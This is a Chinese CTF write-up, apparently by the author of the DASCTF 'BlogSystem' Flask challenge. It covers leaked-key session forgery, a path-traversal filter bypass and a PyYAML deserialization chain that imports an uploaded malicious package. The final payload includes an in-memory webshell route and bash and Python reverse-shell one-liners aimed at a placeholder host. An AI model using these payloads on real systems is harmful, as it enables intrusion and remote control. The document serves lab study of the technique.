BlogSystem的解题思路

题目信息

题目名类型难度
BlogSystemWEB中等

FLAG

  • dasctf{test_flag}

知识点

  1. 信息泄露
  2. flask伪造session
  3. 目录穿越绕过
  4. 代码审计
  5. Yaml反序列化加载恶意模块
  6. 引入恶意模块

解题步骤

信息泄露

image-20221007030905524

首先打开是一个博客系统,只有注册登陆功能。当注册一个账号登陆后发现在界面上多处了三个路由

即修改密码,查看博客,写博客。 这里再注册时候也发现了admin账号已经被人登陆过,所以考虑需不需要拿到admin

image-20221007031159364

接着访问博客路由可以看到上面展示了几篇博客,其中最吸引我们注意的就是那几篇flask的文章,因为这个网站的框架就是flask。

最终在第一篇《flask基础总结》这篇文章中发现了密钥泄露(这种情况之前也在CSDN出现过)

image-20221007031506552

flask伪造session

工具:

https://github.com/noraj/flask-session-cookie-manager

解密:

python flask_session_cookie_manager3.py decode -c eyJfcGVybWFuZW50Ijp0cnVlLCJ1c2VybmFtZSI6InB5c25vdyJ9.Yz8pLA._ETuaCq8YNu0ydsgaDHq5gegTHU -s 7his_1s_my_fav0rite_ke7

image-20221007031733481

正常解出,说明密钥没有问题

加密:

python flask_session_cookie_manager3.py encode -s 7his_1s_my_fav0rite_ke7 -t "{'_permanent': True, 'username': 'admin'}"

image-20221007031858912

获得伪造后的session,替换到cookie去访问

image-20221007032004032

目录穿越绕过

拿到admin用户后发现又多出来一个功能Download

image-20221007032130254

访问发现url中参数为path,尝试目录穿越

download?path=../haipa.jpg

image-20221007032249651

发现直接把我们传入的..给删掉了

再次传参

download?path=././haipa.jpg

正常回显

download?path=.//./haipa.jpg

返回路径:static/upload/../haipa.jpg

这里也就大致可以猜到了这里的替换规则,.replace('..', '').replace('//', '')

只需要使用.//./代替../绕过即可完成目录穿越

image-20221007032650864

代码审计

入口文件位于/app/app.py

from flask import *
import config
# config.py为配置文件
app = Flask(__name__)
app.config.from_object(config)
app.secret_key = '7his_1s_my_fav0rite_ke7'
from model import *
from view import *

# 注册了两个蓝图
app.register_blueprint(index, name='index')
app.register_blueprint(blog, name='blog')

# 一个上写文处理,判断登陆状态的
@app.context_processor
def login_statue():
    username = session.get('username')
    if username:
        try:
            user = User.query.filter(User.username == username).first()
            if user:
                return {"username": username, 'name': user.name, 'password': user.password}
        except Exception as e:
            return e
    return {}

# 404处理路由
@app.errorhandler(404)
def page_not_found(e):
    return render_template('404.html'), 404

# 500处理路由
@app.errorhandler(500)
def internal_server_error(e):
    return render_template('500.html'), 500


if __name__ == '__main__':
    app.run('0.0.0.0', 80)

这里一共导入的包如下

config model view

这就是典型的MVT结构,访问view.py发现找不到,访问view/__init__.py发现在其中又导入了其他模块

view/__init__.py

from .index import index
from .blog import blog

接着把所有源码都给读取出来

view/index.py

from flask import Blueprint, session, render_template, request, flash, redirect, url_for, Response, send_file
from werkzeug.security import check_password_hash
from decorators import login_limit, admin_limit
from model import *
import os

index = Blueprint("index", __name__)


@index.route('/')
def hello():
    return render_template('index.html')


@index.route('/register', methods=['POST', 'GET'])
def register():
    if request.method == 'GET':
        return render_template('register.html')
    if request.method == 'POST':
        name = request.form.get('name')
        username = request.form.get('username')
        password = request.form.get('password')
        user = User.query.filter(User.username == username).first()
        if user is not None:
            flash("该用户名已存在")
            return render_template('register.html')
        else:
            user = User(username=username, name=name)
            user.password_hash(password)
            db.session.add(user)
            db.session.commit()
            flash("注册成功!")
            return render_template('register.html')


@index.route('/login', methods=['POST', 'GET'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        user = User.query.filter(User.username == username).first()
        if (user is not None) and (check_password_hash(user.password, password)):
            session['username'] = user.username
            session.permanent = True
            return redirect(url_for('index.hello'))
        else:
            flash("账号或密码错误")
            return render_template('login.html')


@index.route("/updatePwd", methods=['POST', 'GET'])
@login_limit
def update():
    if request.method == "GET":
        return render_template("updatePwd.html")
    if request.method == 'POST':
        lodPwd = request.form.get("lodPwd")
        newPwd1 = request.form.get("newPwd1")
        newPwd2 = request.form.get("newPwd2")
        username = session.get("username")
        user = User.query.filter(User.username == username).first()
        if check_password_hash(user.password, lodPwd):
            if newPwd1 != newPwd2:
                flash("两次新密码不一致!")
                return render_template("updatePwd.html")
            else:
                user.password_hash(newPwd2)
                db.session.commit()
                flash("修改成功!")
                return render_template("updatePwd.html")
        else:
            flash("原密码错误!")
            return render_template("updatePwd.html")


# 这就是漏洞存在的那一个路由,加个一个admin的装饰器
@index.route('/download', methods=['GET'])
@admin_limit
def download():
    if request.args.get('path'):
        path = request.args.get('path').replace('..', '').replace('//', '')
        path = os.path.join('static/upload/', path)
        if os.path.exists(path):
            return send_file(path)
        else:
            return render_template('404.html', file=path)
    return render_template('sayings.html',
                           yaml='所谓『恶』,是那些只为了自己,利用和践踏弱者的家伙!但是,我虽然是这样,也知道什么是令人作呕的『恶』,所以,由我来制裁!')


@index.route('/logout')
def logout():
    session.clear()
    return redirect(url_for('index.hello'))

view/blog.py

import os
import random
import re
import time

import yaml
from flask import Blueprint, render_template, request, session
from yaml import Loader

from decorators import login_limit, admin_limit
from model import *

blog = Blueprint("blog", __name__, url_prefix="/blog")


def waf(data):
    if re.search(r'apply|process|eval|os|tuple|popen|frozenset|bytes|type|staticmethod|\(|\)', str(data), re.M | re.I):
        return False
    else:
        return True


@blog.route('/writeBlog', methods=['POST', 'GET'])
@login_limit
def writeblog():
    if request.method == 'GET':
        return render_template('writeBlog.html')
    if request.method == 'POST':
        title = request.form.get("title")
        text = request.form.get("text")
        username = session.get('username')
        create_time = time.strftime("%Y-%m-%d %H:%M:%S")
        user = User.query.filter(User.username == username).first()
        blog = Blog(title=title, text=text, create_time=create_time, user_id=user.id)
        db.session.add(blog)
        db.session.commit()
        blog = Blog.query.filter(Blog.create_time == create_time).first()
        return render_template('blogSuccess.html', title=title, id=blog.id)


@blog.route('/imgUpload', methods=['POST'])
@login_limit
def imgUpload():
    try:
        file = request.files.get('editormd-image-file')
        fileName = file.filename.replace('..','')
        filePath = os.path.join("static/upload/", fileName)
        file.save(filePath)
        return {
            'success': 1,
            'message': '上传成功!',
            'url': "/" + filePath
        }
    except Exception as e:
        return {
            'success': 0,
            'message': '上传失败'
        }


@blog.route('/showBlog/<id>')
def showBlog(id):
    blog = Blog.query.filter(Blog.id == id).first()
    comment = Comment.query.filter(Comment.blog_id == blog.id)
    return render_template("showBlog.html", blog=blog, comment=comment)


@blog.route("/blogAll")
def blogAll():
    blogList = Blog.query.order_by(Blog.create_time.desc()).all()
    return render_template('blogAll.html', blogList=blogList)


@blog.route("/update/<id>", methods=['POST', 'GET'])
@login_limit
def update(id):
    if request.method == 'GET':
        blog = Blog.query.filter(Blog.id == id).first()
        return render_template('updateBlog.html', blog=blog)
    if request.method == 'POST':
        id = request.form.get("id")
        title = request.form.get("title")
        text = request.form.get("text")
        blog = Blog.query.filter(Blog.id == id).first()
        blog.title = title
        blog.text = text
        db.session.commit()
        return render_template('blogSuccess.html', title=title, id=id)


@blog.route("/delete/<id>")
@login_limit
def delete(id):
    blog = Blog.query.filter(Blog.id == id).first()
    db.session.delete(blog)
    db.session.commit()
    return {
        'state': True,
        'msg': "删除成功!"
    }


@blog.route("/myBlog")
@login_limit
def myBlog():
    username = session.get('username')
    user = User.query.filter(User.username == username).first()
    blogList = Blog.query.filter(Blog.user_id == user.id).order_by(Blog.create_time.desc()).all()
    return render_template("myBlog.html", blogList=blogList)


@blog.route("/comment", methods=['POST'])
@login_limit
def comment():
    text = request.values.get('text')
    blogId = request.values.get('blogId')
    username = session.get('username')
    create_time = time.strftime("%Y-%m-%d %H:%M:%S")
    user = User.query.filter(User.username == username).first()
    comment = Comment(text=text, create_time=create_time, blog_id=blogId, user_id=user.id)
    db.session.add(comment)
    db.session.commit()
    return {
        'success': True,
        'message': '评论成功!',
    }


@blog.route('/myComment')
@login_limit
def myComment():
    username = session.get('username')
    user = User.query.filter(User.username == username).first()
    commentList = Comment.query.filter(Comment.user_id == user.id).order_by(Comment.create_time.desc()).all()
    return render_template("myComment.html", commentList=commentList)


@blog.route('/deleteCom/<id>')
def deleteCom(id):
    com = Comment.query.filter(Comment.id == id).first()
    db.session.delete(com)
    db.session.commit()
    return {
        'state': True,
        'msg': "删除成功!"
    }


@blog.route('/saying', methods=['GET'])
@admin_limit
def Saying():
    if request.args.get('path'):
        file = request.args.get('path').replace('../', 'hack').replace('..\\', 'hack')
        try:
            with open(file, 'rb') as f:
                f = f.read()
                if waf(f):
                    print(yaml.load(f, Loader=Loader))
                    return render_template('sayings.html', yaml='鲁迅说:当你看到这句话时,还没有拿到flag,那就赶紧重开环境吧')
                else:
                    return render_template('sayings.html', yaml='鲁迅说:你说得不对')
        except Exception as e:
            return render_template('sayings.html', yaml='鲁迅说:'+str(e))
    else:

        with open('view/jojo.yaml', 'r', encoding='utf-8') as f:
            sayings = yaml.load(f, Loader=Loader)
            saying = random.choice(sayings)
            return render_template('sayings.html', yaml=saying)

因为这里用的是ORM操作数据库,也就懒得去看modole的源码了

大致审计一下可以把主要代码省略如下

@blog.route('/imgUpload', methods=['POST'])
@login_limit
def imgUpload():
    try:
        file = request.files.get('editormd-image-file')
        fileName = file.filename.replace('..','')
        filePath = os.path.join("static/upload/", fileName)
        file.save(filePath)
        return {
            'success': 1,
            'message': '上传成功!',
            'url': "/" + filePath
        }
    except Exception as e:
        return {
            'success': 0,
            'message': '上传失败'
        }

这是一个文件上传的路由,没有直接用secure函数去操作文件名,而是使用了一个替换,虽然不能造成目录穿越,但是终究还是比secure操作之后的可利用性更大一些

@blog.route('/saying', methods=['GET'])
@admin_limit
def Saying():
    if request.args.get('path'):
        file = request.args.get('path').replace('../', 'hack').replace('..\\', 'hack')
        try:
            with open(file, 'rb') as f:
                f = f.read()
                if waf(f):
                    print(yaml.load(f, Loader=Loader))
                    return render_template('sayings.html', yaml='鲁迅说:当你看到这句话时,还没有拿到flag,那就赶紧重开环境吧')
                else:
                    return render_template('sayings.html', yaml='鲁迅说:你说得不对')
        except Exception as e:
            return render_template('sayings.html', yaml='鲁迅说:'+str(e))
    else:

        with open('view/jojo.yaml', 'r', encoding='utf-8') as f:
            sayings = yaml.load(f, Loader=Loader)
            saying = random.choice(sayings)
            return render_template('sayings.html', yaml=saying)

接着是一个前端没有展示的路由/blog/saying,直接GET去访问的话会随机出现一些名言

image-20221007034239867

仔细阅读上面的代码发现,当我们传入一个path参数的时候,会对那个文件进行yaml.load加载操作,而且这里使用的还是一个不安全的构造器, Loader,这里再配合上之前的那个文件上传操作就那个达到yaml反序列化的目的

Yaml反序列化绕过

但是回头一看发现这里对文件内容进行了waf过滤,代码如下:

def waf(data):
    if re.search(r'apply|process|eval|os|tuple|popen|frozenset|bytes|type|staticmethod|\(|\)', str(data), re.M | re.I):
        return False
    else:
        return True

这里的waf我故意设计得感觉可以绕过,实际上不能绕过,要不然我就直接把object给过滤了(当然也可能师傅有方法绕过,如果有务必让我膜拜一下)

我们可以知道PyYAML反序列化执行命令的标签就那几个

!!python/object

!!python/object/apply

!!python/object/new

简单看一下第一个因为合适的模块不能执行,第二个被waf写死了,第三个可以操作细讲

new跟apply查看源码可以发现他们最后进入的是同一个函数,所以payload是可以通用的,这里最简单的执行命令的payload如下

!!python/object/new:os.system
  - calc

image-20221007035732948

但是这里有个头疼的地方就是我基本把python所有命令执行的方法都给ban(不知道ban完没)

image-20221007035909604

接着尝试使用内建模块builtin来想办法执行命令,因为我这里值过滤了eval没有过滤exec

使用之前网鼎杯2022青龙组的一道web的payload试试(这个文章我在这道题的博客里面放得有)

!!python/object/new:tuple
- !!python/object/new:map
  - !!python/name:eval
  - ["__import__('os').system('whoami')"]

发现唯一需要绕过的地方就是tutple,也就是寻找不可变对象,我把上次网鼎杯用的那两个payload都加到黑名单了,不知道各位有没有找到新的不可变对象,总之据我所知这里可用的就只有(除去str,int这类)

tuple

bytes

type

frozenset

很显然这些都过了,接着就是利用listitems,state等绕过,虽然没有直接过滤这些,但是实际上也很难想出绕过方法。但是这里因为我用的是Loader加载器,而不是默认的FullLoader,所以就怕在这里被非预期了

引入恶意模块

峰会路转,回头想一想,既然不能直接通过Yaml执行命令,那可不可以间接执行命令呢,Yaml还提供了两个标签

python/module
python/name

他们的作用可以理解为导入模块,如果我们能够构造一个恶意的py脚本或者软件包,然后调用到他就可以实现任意代码执行的目的,具体这两个标签的操作方法可以参考 https://www.tr0y.wang/2022/06/06/SecMap-unserialize-pyyaml/

但是这里又存在一个问题,就是我们可控的目录在第三层,那么我们要怎么在不能目录穿越的情况下导入那个我们可控的脚本呢

image-20221007042003553

很显然可以使用__init__.py,将upload整个文件夹看做是一个软件包,位于static模块下,poc.yaml可以这样编写

!!python/module:static.upload

接着就是编写__init__的内容,这里可以直接反弹shell,但是在用/dev/tcp进行反弹的时候貌似只能bash - c "bash -i",所以我这里推荐Python的反弹shell,当然我为了自己方便编写exp,我就直接使用内存马的方式进行命令执行

from flask import *
eval(
    "app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell')).read())",
    {'_request_ctx_stack': url_for.__globals__['_request_ctx_stack'], 'app': url_for.__globals__['current_app']})
# 生成一个shell路由,参数为shell
import os
os.system('bash -c "bash -i >& /dev/tcp/xxx/2333 0>&1"')
import os,pty,socket;s=socket.socket();s.connect(("xxx",2333));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")

image-20221007042541760

image-20221007042604666

然后访问blog/saying?path=static/upload/poc1.yaml生成路由

image-20221007042746070

特别说明

因为flask的特殊性,这里只能成功加载一次,所以假如你第一次使用的sh反弹shell虽然成功加载但是没有连上shell,那就说明执行了命令,但是那个命令刚好是不行的。这个时候也就不能重新覆盖文件再次加载了,只能重开靶机。所以我也贴心的在加载成功后给了一个提示

最后修改:2022 年 10 月 25 日
如果觉得我的文章对你有用,请随意赞赏
本文作者:
文章标题:DASCTF10月赛出题笔记 BlogSystem
本文地址:https://pysnow.cn/archives/566/
版权说明:若无注明,本文皆Pysnow's Blog原创,转载请保留文章出处。